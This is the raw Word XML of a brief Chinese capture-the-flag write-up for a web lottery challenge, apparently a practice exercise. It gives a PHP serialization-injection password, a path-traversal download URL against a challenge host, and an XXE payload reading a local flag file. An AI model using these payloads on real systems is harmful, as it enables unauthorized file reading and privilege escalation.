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41913" w14:textId="2D702232" w:rsidR="00707220" w:rsidRDefault="004F3300" w:rsidP="00707220">
      <w:pPr>
        <w:pStyle w:val="a7"/>
      </w:pPr>
      <w:r>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidR="00707220">
        <w:t>单身节抽奖</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0249388D" w14:textId="133FE795" w:rsidR="00707220" w:rsidRDefault="00707220" w:rsidP="00707220"/>
    <w:p w14:paraId="1FE687E0" w14:textId="2B8305B8" w:rsidR="00707220" w:rsidRDefault="00707220" w:rsidP="00707220">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">构造密码为 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0087410E">
        <w:t>ccccccc</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE3707">
        <w:t>123456";s:8:"username";s:64:"</w:t>
      </w:r>
      <w:r w:rsidR="0087410E" w:rsidRPr="0087410E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0087410E">
        <w:t>cccccccc</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE3707">
        <w:t>";s:4:"sdog";i:1;}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户名</w:t>
      </w:r>
      <w:r w:rsidR="00394937">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>任意</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68682701" w14:textId="5DB76C22" w:rsidR="00707220" w:rsidRDefault="00707220" w:rsidP="00707220"/>
    <w:p w14:paraId="15963F24" w14:textId="4EBA0022" w:rsidR="00F500A2" w:rsidRDefault="00F500A2" w:rsidP="00707220">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAD39A9" w14:textId="12942F60" w:rsidR="00707220" w:rsidRDefault="00000000" w:rsidP="00707220">
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidR="0087410E" w:rsidRPr="00C55F5A">
          <w:rPr>
            <w:rStyle w:val="a9"/>
          </w:rPr>
          <w:t>http://47.94.14.162:10015/loadzk1myHJ0vaEoT5U0j6xDOVLBw693g83S.php?file=../../../apidemo.php&amp;&amp;check_time=0.5e6</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7923E54A" w14:textId="77777777" w:rsidR="00707220" w:rsidRDefault="00707220" w:rsidP="00707220"/>
    <w:p w14:paraId="5F9BAF35" w14:textId="481195E4" w:rsidR="00707220" w:rsidRDefault="00F500A2" w:rsidP="00707220">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="729D6B94" w14:textId="77777777" w:rsidR="00707220" w:rsidRDefault="00707220" w:rsidP="00707220">
      <w:r w:rsidRPr="00B71B1C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00718202" wp14:editId="1D953D0D">
            <wp:extent cx="5274310" cy="1457325"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="12818359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359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F650" w14:textId="220A134F" w:rsidR="00707220" w:rsidRDefault="00707220" w:rsidP="00707220"/>
    <w:p w14:paraId="0A0AE004" w14:textId="28C949E5" w:rsidR="00707220" w:rsidRDefault="00F475D2" w:rsidP="00707220">
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00F500A2">
        <w:t>ayload</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A47307" w14:textId="77777777" w:rsidR="00F475D2" w:rsidRDefault="00F475D2" w:rsidP="00707220"/>
    <w:p w14:paraId="739E47F7" w14:textId="39176168" w:rsidR="00707220" w:rsidRPr="00B71B1C" w:rsidRDefault="00707220" w:rsidP="00707220">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:t>?xml version="1.0" encoding="utf-8</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>" ?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>&lt;!DOCTYPE name [  </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>&lt;!ENTITY goodies SYSTEM "file:///flag"&gt; ]&gt; </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t> &lt;user&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>     &lt;name&gt;&amp;goodies;&lt;/name&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>     &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>isdog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;sin</w:t>
      </w:r>
      <w:r w:rsidR="00E413CC">
        <w:t>66</w:t>
      </w:r>
      <w:r>
        <w:t>isdog&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>     &lt;award&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00E413CC">
        <w:t>66</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/award&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>&lt;/user&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6A20AE" w14:textId="77777777" w:rsidR="0058219F" w:rsidRDefault="0058219F"/>
    <w:sectPr w:rsidR="00582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2F27D" w14:textId="77777777" w:rsidR="000C2F1B" w:rsidRDefault="000C2F1B" w:rsidP="00707220">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="35FB243C" w14:textId="77777777" w:rsidR="000C2F1B" w:rsidRDefault="000C2F1B" w:rsidP="00707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93139" w14:textId="77777777" w:rsidR="000C2F1B" w:rsidRDefault="000C2F1B" w:rsidP="00707220">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="382786F7" w14:textId="77777777" w:rsidR="000C2F1B" w:rsidRDefault="000C2F1B" w:rsidP="007072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53"/>
    <w:rsid w:val="000C2F1B"/>
    <w:rsid w:val="00394937"/>
    <w:rsid w:val="004F3300"/>
    <w:rsid w:val="0058219F"/>
    <w:rsid w:val="00707220"/>
    <w:rsid w:val="00745253"/>
    <w:rsid w:val="0087410E"/>
    <w:rsid w:val="00CE47CD"/>
    <w:rsid w:val="00E413CC"/>
    <w:rsid w:val="00F1429E"/>
    <w:rsid w:val="00F475D2"/>
    <w:rsid w:val="00F5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C248DE"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{8BE541AF-D97D-4688-9EE2-46B54D545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2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722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72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7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722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072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072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70722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E47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47.94.14.162:10015/loadzk1myHJ0vaEoT5U0j6xDOVLBw693g83S.php?file=../../../apidemo.php&amp;&amp;check_time=0.5e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晋宇</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>张 正阳</cp:lastModifiedBy>
  <cp:revision>9</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-05-21T09:35:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-05-21T09:42:00Z</dcterms:modified>
</cp:coreProperties>
</file>